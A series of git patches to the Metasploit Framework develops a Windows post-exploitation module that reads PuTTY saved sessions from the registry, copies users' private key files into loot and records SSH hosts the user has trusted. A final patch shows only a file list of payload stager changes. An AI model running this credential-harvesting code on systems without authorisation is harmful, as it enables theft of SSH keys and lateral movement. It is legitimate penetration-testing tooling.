+    	    print_status("Unique host:port pairs are shown in the table below. All other details, including the actual fingerprint, are stored in notes (putty.ssh.fingerprint)")
+            display_stored_host_keys_report(all_stored_keys) 
+        else
+            print_error("No stored key fingerprints found")
+        end
     end
+
   end
 
 end

From 53311fda2e9adba04fac10bc6bdf3856ca78d614 Mon Sep 17 00:00:00 2001
From: Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
Date: Sun, 17 May 2015 13:02:58 +0100
Subject: [PATCH 0093/1013] Fixed logic & added notes storage

---
 .../gather/putty_enum_saved_sessions.rb       | 23 ++++++++++++-------
 1 file changed, 15 insertions(+), 8 deletions(-)

diff --git a/modules/post/windows/gather/putty_enum_saved_sessions.rb b/modules/post/windows/gather/putty_enum_saved_sessions.rb
index 77e1d93d2a..48c819b877 100644
--- a/modules/post/windows/gather/putty_enum_saved_sessions.rb
+++ b/modules/post/windows/gather/putty_enum_saved_sessions.rb
@@ -43,6 +43,7 @@ class Metasploit3 < Msf::Post
             newses[key] = registry_getvaldata("HKCU\\Software\\SimonTatham\\PuTTY\\Sessions\\#{ses}", key).to_s
         end
         all_sessions << newses
+        report_note(host: target_host, type: "putty.savedsession", data: newses)
     end 
     all_sessions
   end
@@ -104,6 +105,7 @@ class Metasploit3 < Msf::Post
             all_ssh_host_keys[host_port] = [] if all_ssh_host_keys[host_port].nil?
             all_ssh_host_keys[host_port] << newkey['type']
         end
+        report_note(host: target_host, type: "putty.storedhostfp", data: newkey)
     end 
     all_ssh_host_keys
   end
@@ -130,13 +132,18 @@ class Metasploit3 < Msf::Post
 
   def grab_private_keys(sessions)
     sessions.each do |ses|
+
         filename = ses['PublicKeyFile'].to_s
         next if filename.empty?
 
+        # Check whether the file exists.
         if file?(filename)
-           ppk = read_file(filename) 
-           stored_path = store_loot('putty.ppk.file', 'text/plain', session, ppk)
-           print_status("PuTTY private key file for \'#{ses['Name']}\' (#{filename}) saved to: #{stored_path}")
+           if ppk = read_file(filename) # Attempt to read the contents of the file
+                stored_path = store_loot('putty.ppk.file', 'application/octet-stream', session, ppk)
+                print_status("PuTTY private key file for \'#{ses['Name']}\' (#{filename}) saved to: #{stored_path}")
+           else
+                print_error("Unable to read PuTTY private key file for \'#{ses['Name']}\' (#{filename})") # May be that we do not have permissions etc
+           end
         else
            print_error("PuTTY private key file for \'#{ses['Name']}\' (#{filename}) could not be found.")
         end
@@ -149,8 +156,7 @@ class Metasploit3 < Msf::Post
 
     # Look for saved sessions, break out if not.
     print_status("Looking for saved PuTTY sessions")
-    #saved_sessions = registry_enumkeys('HKCU\\Software\\SimonTatham\\PuTTY\\Sessions')
-    saved_sessions = nil
+    saved_sessions = registry_enumkeys('HKCU\\Software\\SimonTatham\\PuTTY\\Sessions')
     if saved_sessions.nil? || saved_sessions.empty?
         print_error('No saved sessions found')
     else
@@ -161,6 +167,7 @@ class Metasploit3 < Msf::Post
 	    # Retrieve the saved session details & print them to the screen in a report
 	    all_saved_sessions = get_saved_session_details(saved_sessions)
 	    display_saved_sessions_report(all_saved_sessions)
+    	print_status("Session data also stored in notes. Use 'notes -t putty.savedsessions to view'.")
 	
 	    # If the private key file has been configured, retrieve it and save it to loot
 	    print_status("Downloading private keys...")
@@ -182,10 +189,10 @@ class Metasploit3 < Msf::Post
 	    print_status("Downloading stored key fingerprints...")
 	    all_stored_keys = get_stored_host_key_details(stored_ssh_host_keys)
         if all_stored_keys.nil? || all_stored_keys.empty?
-    	    print_status("Unique host:port pairs are shown in the table below. All other details, including the actual fingerprint, are stored in notes (putty.ssh.fingerprint)")
-            display_stored_host_keys_report(all_stored_keys) 
-        else
             print_error("No stored key fingerprints found")
+        else
+    	    print_status("Unique host:port pairs are shown in the table below. All other details, including the actual fingerprint, are stored in notes. Use 'notes -t putty.storedhostfp to view'.")
+            display_stored_host_keys_report(all_stored_keys) 
         end
     end
 

From 8aa27eee94ca464e3e6404d8dcc1e92fac503af1 Mon Sep 17 00:00:00 2001
From: Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
Date: Sun, 17 May 2015 13:06:05 +0100
Subject: [PATCH 0094/1013] report_note only appears to allow one note per
 host/type combo...

---
 modules/post/windows/gather/putty_enum_saved_sessions.rb | 2 --
 1 file changed, 2 deletions(-)

diff --git a/modules/post/windows/gather/putty_enum_saved_sessions.rb b/modules/post/windows/gather/putty_enum_saved_sessions.rb
index 48c819b877..6fd7a0b68c 100644
--- a/modules/post/windows/gather/putty_enum_saved_sessions.rb
+++ b/modules/post/windows/gather/putty_enum_saved_sessions.rb
@@ -43,7 +43,6 @@ class Metasploit3 < Msf::Post
             newses[key] = registry_getvaldata("HKCU\\Software\\SimonTatham\\PuTTY\\Sessions\\#{ses}", key).to_s
         end
         all_sessions << newses
-        report_note(host: target_host, type: "putty.savedsession", data: newses)
     end 
     all_sessions
   end
@@ -105,7 +104,6 @@ class Metasploit3 < Msf::Post
             all_ssh_host_keys[host_port] = [] if all_ssh_host_keys[host_port].nil?
             all_ssh_host_keys[host_port] << newkey['type']
         end
-        report_note(host: target_host, type: "putty.storedhostfp", data: newkey)
     end 
     all_ssh_host_keys
   end

From 4a416bba3c8b14b20d07776eec5cdc2fbbbecf32 Mon Sep 17 00:00:00 2001
From: Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
Date: Sun, 17 May 2015 13:24:38 +0100
Subject: [PATCH 0095/1013] Fixed notes using :unique_data

---
 modules/post/windows/gather/putty_enum_saved_sessions.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/modules/post/windows/gather/putty_enum_saved_sessions.rb b/modules/post/windows/gather/putty_enum_saved_sessions.rb
index 6fd7a0b68c..523fcbffe2 100644
--- a/modules/post/windows/gather/putty_enum_saved_sessions.rb
+++ b/modules/post/windows/gather/putty_enum_saved_sessions.rb
@@ -43,6 +43,7 @@ class Metasploit3 < Msf::Post
             newses[key] = registry_getvaldata("HKCU\\Software\\SimonTatham\\PuTTY\\Sessions\\#{ses}", key).to_s
         end
         all_sessions << newses
+        report_note(host: target_host, type: "putty.savedsession", data: newses, update: :unique_data)
     end 
     all_sessions
   end
@@ -104,6 +105,7 @@ class Metasploit3 < Msf::Post
             all_ssh_host_keys[host_port] = [] if all_ssh_host_keys[host_port].nil?
             all_ssh_host_keys[host_port] << newkey['type']
         end
+        report_note(host: target_host, type: "putty.storedfingerprint", data: newkey, update: :unique_data)
     end 
     all_ssh_host_keys
   end
@@ -189,7 +191,7 @@ class Metasploit3 < Msf::Post
         if all_stored_keys.nil? || all_stored_keys.empty?
             print_error("No stored key fingerprints found")
         else
-    	    print_status("Unique host:port pairs are shown in the table below. All other details, including the actual fingerprint, are stored in notes. Use 'notes -t putty.storedhostfp to view'.")
+    	    print_status("Unique host:port pairs are shown in the table below. All other details, including the actual fingerprint, are stored in notes. Use 'notes -t putty.storedfingerprint to view'.")
             display_stored_host_keys_report(all_stored_keys) 
         end
     end

From 18a9dfd6dadf2758bcfe6f39888e1091cace2fd9 Mon Sep 17 00:00:00 2001
From: Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
Date: Sun, 17 May 2015 14:37:59 +0100
Subject: [PATCH 0096/1013] Added PAGEANT_REGISTRY_KEY variable to enhance
 readability

---
 modules/post/windows/gather/putty_enum_saved_sessions.rb | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/modules/post/windows/gather/putty_enum_saved_sessions.rb b/modules/post/windows/gather/putty_enum_saved_sessions.rb
index 523fcbffe2..dac8d00d83 100644
--- a/modules/post/windows/gather/putty_enum_saved_sessions.rb
+++ b/modules/post/windows/gather/putty_enum_saved_sessions.rb
@@ -15,6 +15,8 @@ class Metasploit3 < Msf::Post
   include Msf::Post::Windows::Registry
 
   INTERESTING_KEYS=['HostName','PublicKeyFile','UserName','PortNumber','PortForwardings']
+  PAGEANT_REGISTRY_KEY="HKCU\\Software\\SimonTatham\\PuTTY"
+
   def initialize(info={})
     super(update_info(info,
       'Name'            => "PuTTY Saved Sessions Enumeration Module",
@@ -40,7 +42,7 @@ class Metasploit3 < Msf::Post
         newses = {}
         newses['Name'] = Rex::Text.uri_decode(ses)
         INTERESTING_KEYS.each do |key|
-            newses[key] = registry_getvaldata("HKCU\\Software\\SimonTatham\\PuTTY\\Sessions\\#{ses}", key).to_s
+            newses[key] = registry_getvaldata("#{PAGEANT_REGISTRY_KEY}\\Sessions\\#{ses}", key).to_s
         end
         all_sessions << newses
         report_note(host: target_host, type: "putty.savedsession", data: newses, update: :unique_data)
@@ -85,7 +87,7 @@ class Metasploit3 < Msf::Post
         # Store the raw key and value in a hash to start off with
         newkey = {
           rawname: key,
-          rawsig: registry_getvaldata("HKCU\\Software\\SimonTatham\\PuTTY\\SshHostKeys", key).to_s
+          rawsig: registry_getvaldata("#{PAGEANT_REGISTRY_KEY}\\SshHostKeys", key).to_s
         }
 
         # Take the key and split up host, port and fingerprint type. If it matches, store the information
@@ -156,7 +158,7 @@ class Metasploit3 < Msf::Post
 
     # Look for saved sessions, break out if not.
     print_status("Looking for saved PuTTY sessions")
-    saved_sessions = registry_enumkeys('HKCU\\Software\\SimonTatham\\PuTTY\\Sessions')
+    saved_sessions = registry_enumkeys("#{PAGEANT_REGISTRY_KEY}\\Sessions")
     if saved_sessions.nil? || saved_sessions.empty?
         print_error('No saved sessions found')
     else

From 1177f42263baa1a46814625e04bf471b7db9150d Mon Sep 17 00:00:00 2001
From: Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
Date: Sun, 17 May 2015 14:38:25 +0100
Subject: [PATCH 0097/1013] Renamed module to remain consistent with other enum
 modules

---
 ...{putty_enum_saved_sessions.rb => enum_putty_saved_sessions.rb} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename modules/post/windows/gather/{putty_enum_saved_sessions.rb => enum_putty_saved_sessions.rb} (100%)

diff --git a/modules/post/windows/gather/putty_enum_saved_sessions.rb b/modules/post/windows/gather/enum_putty_saved_sessions.rb
similarity index 100%
rename from modules/post/windows/gather/putty_enum_saved_sessions.rb
rename to modules/post/windows/gather/enum_putty_saved_sessions.rb

From b12db7b6335566645293f999aba21af90deee2a2 Mon Sep 17 00:00:00 2001
From: Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
Date: Sun, 17 May 2015 14:59:26 +0100
Subject: [PATCH 0098/1013] Retrieves saved session lists etc to loot and
 exports information in CSV format

---
 modules/post/windows/gather/enum_putty_saved_sessions.rb | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/modules/post/windows/gather/enum_putty_saved_sessions.rb b/modules/post/windows/gather/enum_putty_saved_sessions.rb
index dac8d00d83..d9d8158f2b 100644
--- a/modules/post/windows/gather/enum_putty_saved_sessions.rb
+++ b/modules/post/windows/gather/enum_putty_saved_sessions.rb
@@ -69,7 +69,10 @@ class Metasploit3 < Msf::Post
       results_table << row
     end
 
+    print_line
     print_line results_table.to_s
+    stored_path = store_loot('putty.sessions.csv', 'text/csv', session, results_table.to_csv, nil, "PuTTY Saved Sessions List")
+    print_status("PuTTY saved sessions list saved to #{stored_path} in CSV format & available in notes (use 'notes -t putty.savedsession' to view).")
   end
 
   def get_stored_host_key_details(allkeys)
@@ -129,7 +132,10 @@ class Metasploit3 < Msf::Post
       results_table << row
     end
 
+    print_line
     print_line results_table.to_s
+    stored_path = store_loot('putty.storedfingerprints.csv', 'text/csv', session, results_table.to_csv, nil, "PuTTY Stored SSH Host Keys List")
+    print_status("PuTTY stored host keys list saved to #{stored_path} in CSV format & available in notes (use 'notes -t putty.storedfingerprint' to view).")
   end
 
   def grab_private_keys(sessions)
@@ -169,7 +175,6 @@ class Metasploit3 < Msf::Post
 	    # Retrieve the saved session details & print them to the screen in a report
 	    all_saved_sessions = get_saved_session_details(saved_sessions)
 	    display_saved_sessions_report(all_saved_sessions)
-    	print_status("Session data also stored in notes. Use 'notes -t putty.savedsessions to view'.")
 	
 	    # If the private key file has been configured, retrieve it and save it to loot
 	    print_status("Downloading private keys...")
@@ -193,7 +198,6 @@ class Metasploit3 < Msf::Post
         if all_stored_keys.nil? || all_stored_keys.empty?
             print_error("No stored key fingerprints found")
         else
-    	    print_status("Unique host:port pairs are shown in the table below. All other details, including the actual fingerprint, are stored in notes. Use 'notes -t putty.storedfingerprint to view'.")
             display_stored_host_keys_report(all_stored_keys) 
         end
     end

From a4f67bce6f4f844cf25730a9bfb59caebc44d85c Mon Sep 17 00:00:00 2001
From: Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
Date: Sun, 17 May 2015 15:48:05 +0100
Subject: [PATCH 0099/1013] Tidied up code

---
 .../windows/gather/enum_putty_saved_sessions.rb  | 16 ++++++++++++++--
 1 file changed, 14 insertions(+), 2 deletions(-)

diff --git a/modules/post/windows/gather/enum_putty_saved_sessions.rb b/modules/post/windows/gather/enum_putty_saved_sessions.rb
index d9d8158f2b..df76db11ca 100644
--- a/modules/post/windows/gather/enum_putty_saved_sessions.rb
+++ b/modules/post/windows/gather/enum_putty_saved_sessions.rb
@@ -148,12 +148,12 @@ class Metasploit3 < Msf::Post
         if file?(filename)
            if ppk = read_file(filename) # Attempt to read the contents of the file
                 stored_path = store_loot('putty.ppk.file', 'application/octet-stream', session, ppk)
-                print_status("PuTTY private key file for \'#{ses['Name']}\' (#{filename}) saved to: #{stored_path}")
+                print_good("PuTTY private key file for \'#{ses['Name']}\' (#{filename}) saved to: #{stored_path}")
            else
                 print_error("Unable to read PuTTY private key file for \'#{ses['Name']}\' (#{filename})") # May be that we do not have permissions etc
            end
         else
-           print_error("PuTTY private key file for \'#{ses['Name']}\' (#{filename}) could not be found.")
+           print_error("PuTTY private key file for \'#{ses['Name']}\' (#{filename}) could not be read.")
         end
     end
   end
@@ -182,6 +182,8 @@ class Metasploit3 < Msf::Post
 
     end
 
+    print_line # Just for readability
+
     # Now search for SSH stored keys. These could be useful because it shows hosts that the user
     # has previously connected to and accepted a key from. 
     print_status("Looking for previously stored SSH host key fingerprints")
@@ -202,6 +204,16 @@ class Metasploit3 < Msf::Post
         end
     end
 
+    print_line # Just for readability
+
+    print_status("Looking for Pageant...")
+    hwnd = client.railgun.user32.FindWindowW("Pageant", "Pageant")
+    if hwnd['return']
+        print_good("Pageant is running (Handle 0x#{sprintf("%x",hwnd['return'])})")
+    else
+        print_error("Pageant is not running")
+    end 
+
   end
 
 end

From 5e4566712a207242ed6dc3519d7355a2d4e676be Mon Sep 17 00:00:00 2001
From: Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
Date: Sun, 17 May 2015 16:00:44 +0100
Subject: [PATCH 0100/1013] Added more detailed description

---
 modules/post/windows/gather/enum_putty_saved_sessions.rb | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/modules/post/windows/gather/enum_putty_saved_sessions.rb b/modules/post/windows/gather/enum_putty_saved_sessions.rb
index df76db11ca..a3a553ab3c 100644
--- a/modules/post/windows/gather/enum_putty_saved_sessions.rb
+++ b/modules/post/windows/gather/enum_putty_saved_sessions.rb
@@ -24,9 +24,10 @@ class Metasploit3 < Msf::Post
         This module will identify whether Pageant (PuTTY Agent) is running and obtain saved session
         information from the registry. PuTTY is very configurable; some users may have configured
         saved sessions which could include a username, private key file to use when authenticating,
-        host name etc.
-
-        If a private key is configured, an attempt will be made to download and store it in loot.
+        host name etc.  If a private key is configured, an attempt will be made to download and store 
+        it in loot. It will also record the SSH host keys which have been stored. These will be connections that
+        the user has previously after accepting the host SSH fingerprint and therefore are of particular
+        interest if they are within scope of a penetration test.
        },
       'License'         => MSF_LICENSE,
       'Platform'        => ['win'],

From f1955cb15dc644e1996b2bf279f238101fa10099 Mon Sep 17 00:00:00 2001
From: Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
Date: Sun, 17 May 2015 16:09:19 +0100
Subject: [PATCH 0101/1013] Rubocopped the file

---
 .../gather/enum_putty_saved_sessions.rb       | 187 +++++++++---------
 1 file changed, 89 insertions(+), 98 deletions(-)

diff --git a/modules/post/windows/gather/enum_putty_saved_sessions.rb b/modules/post/windows/gather/enum_putty_saved_sessions.rb
index a3a553ab3c..915fbf9f0d 100644
--- a/modules/post/windows/gather/enum_putty_saved_sessions.rb
+++ b/modules/post/windows/gather/enum_putty_saved_sessions.rb
@@ -14,45 +14,43 @@ class Metasploit3 < Msf::Post
   include Msf::Post::File
   include Msf::Post::Windows::Registry
 
-  INTERESTING_KEYS=['HostName','PublicKeyFile','UserName','PortNumber','PortForwardings']
-  PAGEANT_REGISTRY_KEY="HKCU\\Software\\SimonTatham\\PuTTY"
+  INTERESTING_KEYS = ['HostName', 'PublicKeyFile', 'UserName', 'PortNumber', 'PortForwardings']
+  PAGEANT_REGISTRY_KEY = "HKCU\\Software\\SimonTatham\\PuTTY"
 
-  def initialize(info={})
+  def initialize(info = {})
     super(update_info(info,
-      'Name'            => "PuTTY Saved Sessions Enumeration Module",
-      'Description'     => %q{
-        This module will identify whether Pageant (PuTTY Agent) is running and obtain saved session
-        information from the registry. PuTTY is very configurable; some users may have configured
-        saved sessions which could include a username, private key file to use when authenticating,
-        host name etc.  If a private key is configured, an attempt will be made to download and store 
-        it in loot. It will also record the SSH host keys which have been stored. These will be connections that
-        the user has previously after accepting the host SSH fingerprint and therefore are of particular
-        interest if they are within scope of a penetration test.
-       },
-      'License'         => MSF_LICENSE,
-      'Platform'        => ['win'],
-      'SessionTypes'    => ['meterpreter'],
-      'Author'          => ['Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>']
-    ))
+                      'Name'            => "PuTTY Saved Sessions Enumeration Module",
+                      'Description'     => %q{
+                        This module will identify whether Pageant (PuTTY Agent) is running and obtain saved session
+                        information from the registry. PuTTY is very configurable; some users may have configured
+                        saved sessions which could include a username, private key file to use when authenticating,
+                        host name etc.  If a private key is configured, an attempt will be made to download and store
+                        it in loot. It will also record the SSH host keys which have been stored. These will be connections that
+                        the user has previously after accepting the host SSH fingerprint and therefore are of particular
+                        interest if they are within scope of a penetration test.
+                       },
+                      'License'         => MSF_LICENSE,
+                      'Platform'        => ['win'],
+                      'SessionTypes'    => ['meterpreter'],
+                      'Author'          => ['Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>']
+                     ))
   end
 
   def get_saved_session_details(sessions)
-
     all_sessions = []
     sessions.each do |ses|
-        newses = {}
-        newses['Name'] = Rex::Text.uri_decode(ses)
-        INTERESTING_KEYS.each do |key|
-            newses[key] = registry_getvaldata("#{PAGEANT_REGISTRY_KEY}\\Sessions\\#{ses}", key).to_s
-        end
-        all_sessions << newses
-        report_note(host: target_host, type: "putty.savedsession", data: newses, update: :unique_data)
-    end 
+      newses = {}
+      newses['Name'] = Rex::Text.uri_decode(ses)
+      INTERESTING_KEYS.each do |key|
+        newses[key] = registry_getvaldata("#{PAGEANT_REGISTRY_KEY}\\Sessions\\#{ses}", key).to_s
+      end
+      all_sessions << newses
+      report_note(host: target_host, type: "putty.savedsession", data: newses, update: :unique_data)
+    end
     all_sessions
   end
 
   def display_saved_sessions_report(info)
-
     # Results table holds raw string data
     results_table = Rex::Ui::Text::Table.new(
       'Header'     => "PuTTY Saved Sessions",
@@ -66,7 +64,7 @@ class Metasploit3 < Msf::Post
       row << result['Name']
       INTERESTING_KEYS.each do |key|
         row << result[key]
-      end  
+      end
       results_table << row
     end
 
@@ -77,47 +75,44 @@ class Metasploit3 < Msf::Post
   end
 
   def get_stored_host_key_details(allkeys)
-
     # This hash will store (as the key) host:port pairs. This is basically a quick way of
     # getting a unique list of host:port pairs.
     all_ssh_host_keys = {}
 
     # This regex will split up lines such as rsa2@22:127.0.0.1 from the registry.
-    rx_split_hostporttype = %r{^(?<type>[-a-z0-9]+?)@(?<port>[0-9]+?):(?<host>.+)$}i
+    rx_split_hostporttype = /^(?<type>[-a-z0-9]+?)@(?<port>[0-9]+?):(?<host>.+)$/i
 
     # Go through each of the stored keys found in the registry
     allkeys.each do |key|
+      # Store the raw key and value in a hash to start off with
+      newkey = {
+        rawname: key,
+        rawsig: registry_getvaldata("#{PAGEANT_REGISTRY_KEY}\\SshHostKeys", key).to_s
+      }
 
-        # Store the raw key and value in a hash to start off with
-        newkey = {
-          rawname: key,
-          rawsig: registry_getvaldata("#{PAGEANT_REGISTRY_KEY}\\SshHostKeys", key).to_s
-        }
+      # Take the key and split up host, port and fingerprint type. If it matches, store the information
+      # in the hash for later.
+      split_hostporttype = rx_split_hostporttype.match(key.to_s)
+      if split_hostporttype
 
-        # Take the key and split up host, port and fingerprint type. If it matches, store the information
-        # in the hash for later.
-        split_hostporttype = rx_split_hostporttype.match(key.to_s)
-        if split_hostporttype
+        # Extract the host, port and key type into the hash
+        newkey['host'] = split_hostporttype[:host]
+        newkey['port'] = split_hostporttype[:port]
+        newkey['type'] = split_hostporttype[:type]
 
-            # Extract the host, port and key type into the hash
-            newkey['host'] = split_hostporttype[:host]
-            newkey['port'] = split_hostporttype[:port]
-            newkey['type'] = split_hostporttype[:type]
+        # Form the key
+        host_port = "#{newkey['host']}:#{newkey['port']}"
 
-            # Form the key 
-            host_port = "#{newkey['host']}:#{newkey['port']}"
-
-            # Add it to the consolidation hash. If the same IP has different key types, append to the array
-            all_ssh_host_keys[host_port] = [] if all_ssh_host_keys[host_port].nil?
-            all_ssh_host_keys[host_port] << newkey['type']
-        end
-        report_note(host: target_host, type: "putty.storedfingerprint", data: newkey, update: :unique_data)
-    end 
+        # Add it to the consolidation hash. If the same IP has different key types, append to the array
+        all_ssh_host_keys[host_port] = [] if all_ssh_host_keys[host_port].nil?
+        all_ssh_host_keys[host_port] << newkey['type']
+      end
+      report_note(host: target_host, type: "putty.storedfingerprint", data: newkey, update: :unique_data)
+    end
     all_ssh_host_keys
   end
 
   def display_stored_host_keys_report(info)
-
     # Results table holds raw string data
     results_table = Rex::Ui::Text::Table.new(
       'Header'     => "Stored SSH host key fingerprints",
@@ -126,7 +121,7 @@ class Metasploit3 < Msf::Post
       'Columns'    => ['SSH Endpoint', 'Key Type(s)']
     )
 
-    info.each do |key,result|
+    info.each do |key, result|
       row = []
       row << key
       row << result.join(', ')
@@ -141,68 +136,66 @@ class Metasploit3 < Msf::Post
 
   def grab_private_keys(sessions)
     sessions.each do |ses|
+      filename = ses['PublicKeyFile'].to_s
+      next if filename.empty?
 
-        filename = ses['PublicKeyFile'].to_s
-        next if filename.empty?
-
-        # Check whether the file exists.
-        if file?(filename)
-           if ppk = read_file(filename) # Attempt to read the contents of the file
-                stored_path = store_loot('putty.ppk.file', 'application/octet-stream', session, ppk)
-                print_good("PuTTY private key file for \'#{ses['Name']}\' (#{filename}) saved to: #{stored_path}")
-           else
-                print_error("Unable to read PuTTY private key file for \'#{ses['Name']}\' (#{filename})") # May be that we do not have permissions etc
-           end
+      # Check whether the file exists.
+      if file?(filename)
+        ppk = read_file(filename)
+        if ppk # Attempt to read the contents of the file
+          stored_path = store_loot('putty.ppk.file', 'application/octet-stream', session, ppk)
+          print_good("PuTTY private key file for \'#{ses['Name']}\' (#{filename}) saved to: #{stored_path}")
         else
-           print_error("PuTTY private key file for \'#{ses['Name']}\' (#{filename}) could not be read.")
+          print_error("Unable to read PuTTY private key file for \'#{ses['Name']}\' (#{filename})") # May be that we do not have permissions etc
         end
+      else
+        print_error("PuTTY private key file for \'#{ses['Name']}\' (#{filename}) could not be read.")
+      end
     end
   end
 
-  
   # Entry point
   def run
-
     # Look for saved sessions, break out if not.
     print_status("Looking for saved PuTTY sessions")
     saved_sessions = registry_enumkeys("#{PAGEANT_REGISTRY_KEY}\\Sessions")
     if saved_sessions.nil? || saved_sessions.empty?
-        print_error('No saved sessions found')
+      print_error('No saved sessions found')
     else
 
-	    # Tell the user how many sessions have been found (with correct English)
-	    print_status("Found #{saved_sessions.count} session#{saved_sessions.count>1?'s':''}") 
-	
-	    # Retrieve the saved session details & print them to the screen in a report
-	    all_saved_sessions = get_saved_session_details(saved_sessions)
-	    display_saved_sessions_report(all_saved_sessions)
-	
-	    # If the private key file has been configured, retrieve it and save it to loot
-	    print_status("Downloading private keys...")
-	    grab_private_keys(all_saved_sessions)
+      # Tell the user how many sessions have been found (with correct English)
+      print_status("Found #{saved_sessions.count} session#{saved_sessions.count > 1 ? 's' : ''}")
+
+      # Retrieve the saved session details & print them to the screen in a report
+      all_saved_sessions = get_saved_session_details(saved_sessions)
+      display_saved_sessions_report(all_saved_sessions)
+
+      # If the private key file has been configured, retrieve it and save it to loot
+      print_status("Downloading private keys...")
+      grab_private_keys(all_saved_sessions)
 
     end
 
     print_line # Just for readability
 
     # Now search for SSH stored keys. These could be useful because it shows hosts that the user
-    # has previously connected to and accepted a key from. 
+    # has previously connected to and accepted a key from.
     print_status("Looking for previously stored SSH host key fingerprints")
-    stored_ssh_host_keys = registry_enumvals('HKCU\\Software\\SimonTatham\\PuTTY\\SshHostKeys')
+    stored_ssh_host_keys = registry_enumvals("#{PAGEANT_REGISTRY_KEY}\\SshHostKeys")
     if stored_ssh_host_keys.nil? || stored_ssh_host_keys.empty?
-        print_error('No stored SSH host keys found')
+      print_error('No stored SSH host keys found')
     else
-	    # Tell the user how many sessions have been found (with correct English)
-	    print_status("Found #{stored_ssh_host_keys.count} stored key fingerprint#{stored_ssh_host_keys.count>1?'s':''}") 
+      # Tell the user how many sessions have been found (with correct English)
+      print_status("Found #{stored_ssh_host_keys.count} stored key fingerprint#{stored_ssh_host_keys.count > 1 ? 's' : ''}")
 
-	    # Retrieve the saved session details & print them to the screen in a report
-	    print_status("Downloading stored key fingerprints...")
-	    all_stored_keys = get_stored_host_key_details(stored_ssh_host_keys)
-        if all_stored_keys.nil? || all_stored_keys.empty?
-            print_error("No stored key fingerprints found")
-        else
-            display_stored_host_keys_report(all_stored_keys) 
-        end
+      # Retrieve the saved session details & print them to the screen in a report
+      print_status("Downloading stored key fingerprints...")
+      all_stored_keys = get_stored_host_key_details(stored_ssh_host_keys)
+      if all_stored_keys.nil? || all_stored_keys.empty?
+        print_error("No stored key fingerprints found")
+      else
+        display_stored_host_keys_report(all_stored_keys)
+      end
     end
 
     print_line # Just for readability
@@ -210,11 +203,9 @@ class Metasploit3 < Msf::Post
     print_status("Looking for Pageant...")
     hwnd = client.railgun.user32.FindWindowW("Pageant", "Pageant")
     if hwnd['return']
-        print_good("Pageant is running (Handle 0x#{sprintf("%x",hwnd['return'])})")
+      print_good("Pageant is running (Handle 0x#{sprintf('%x', hwnd['return'])})")
     else
-        print_error("Pageant is not running")
-    end 
-
+      print_error("Pageant is not running")
+    end
   end
-
 end

From 0d56b3ee66cec060ee16bdeb93193433512371e3 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 15 May 2015 12:27:25 +1000
Subject: [PATCH 0102/1013] Stage UUIDs, generation options, php and python
 meterp uuid

---
 data/meterpreter/meterpreter.php              | 25 +++--
 data/meterpreter/meterpreter.py               | 13 ++-
 lib/msf/core/handler/reverse_http.rb          | 10 +-
 lib/msf/core/payload.rb                       | 10 ++
 lib/msf/core/payload/dalvik.rb                |  2 +-
 lib/msf/core/payload/generic.rb               |  4 +-
 lib/msf/core/payload/java.rb                  |  2 +-
 lib/msf/core/payload/linux/bind_tcp.rb        | 15 +++
 lib/msf/core/payload/linux/reverse_tcp.rb     | 27 +++++-
 lib/msf/core/payload/linux/send_uuid.rb       | 53 ++++++++++
 lib/msf/core/payload/stager.rb                | 13 ++-
 lib/msf/core/payload/windows/bind_tcp.rb      | 97 +++++++++++--------
 lib/msf/core/payload/windows/reverse_tcp.rb   | 78 ++++++++-------
 lib/msf/core/payload/windows/send_uuid.rb     | 50 ++++++++++
 lib/msf/core/payload/windows/x64/bind_tcp.rb  | 14 +++
 .../core/payload/windows/x64/reverse_tcp.rb   | 22 ++++-
 lib/msf/core/payload/windows/x64/send_uuid.rb | 52 ++++++++++
 modules/payloads/singles/bsd/x64/exec.rb      |  2 +-
 modules/payloads/singles/bsd/x86/exec.rb      |  2 +-
 .../payloads/singles/linux/armle/adduser.rb   |  2 +-
 modules/payloads/singles/linux/armle/exec.rb  |  2 +-
 modules/payloads/singles/linux/x64/exec.rb    |  2 +-
 modules/payloads/singles/linux/x86/adduser.rb |  2 +-
 modules/payloads/singles/linux/x86/chmod.rb   |  2 +-
 modules/payloads/singles/linux/x86/exec.rb    |  2 +-
 .../payloads/singles/linux/x86/read_file.rb   |  2 +-
 modules/payloads/singles/osx/x86/exec.rb      |  2 +-
 .../stagers/linux/x86/bind_tcp_uuid.rb        | 44 +++++++++
 .../stagers/linux/x86/reverse_tcp_uuid.rb     | 42 ++++++++
 modules/payloads/stagers/windows/bind_tcp.rb  | 20 ++--
 .../payloads/stagers/windows/bind_tcp_rc4.rb  |  4 +-
 .../payloads/stagers/windows/bind_tcp_uuid.rb | 44 +++++++++
 .../payloads/stagers/windows/reverse_tcp.rb   | 20 ++--
 .../stagers/windows/reverse_tcp_rc4.rb        |  4 +-
 .../stagers/windows/reverse_tcp_rc4_dns.rb    |  3 +-
 .../stagers/windows/reverse_tcp_uuid.rb       | 44 +++++++++
 .../stagers/windows/x64/bind_tcp_uuid.rb      | 43 ++++++++
 .../stagers/windows/x64/reverse_tcp.rb        | 20 ++--
 .../stagers/windows/x64/reverse_tcp_uuid.rb   | 43 ++++++++
 .../payloads/stages/android/meterpreter.rb    |  3 +-
 modules/payloads/stages/android/shell.rb      |  2 +-
 modules/payloads/stages/java/meterpreter.rb   |  5 +-
 .../payloads/stages/linux/x86/meterpreter.rb  |  4 +-
 modules/payloads/stages/osx/armle/execute.rb  |  4 +-
 modules/payloads/stages/php/meterpreter.rb    | 13 ++-
 modules/payloads/stages/python/meterpreter.rb | 12 ++-
 .../payloads/stages/windows/meterpreter.rb    | 20 ++--
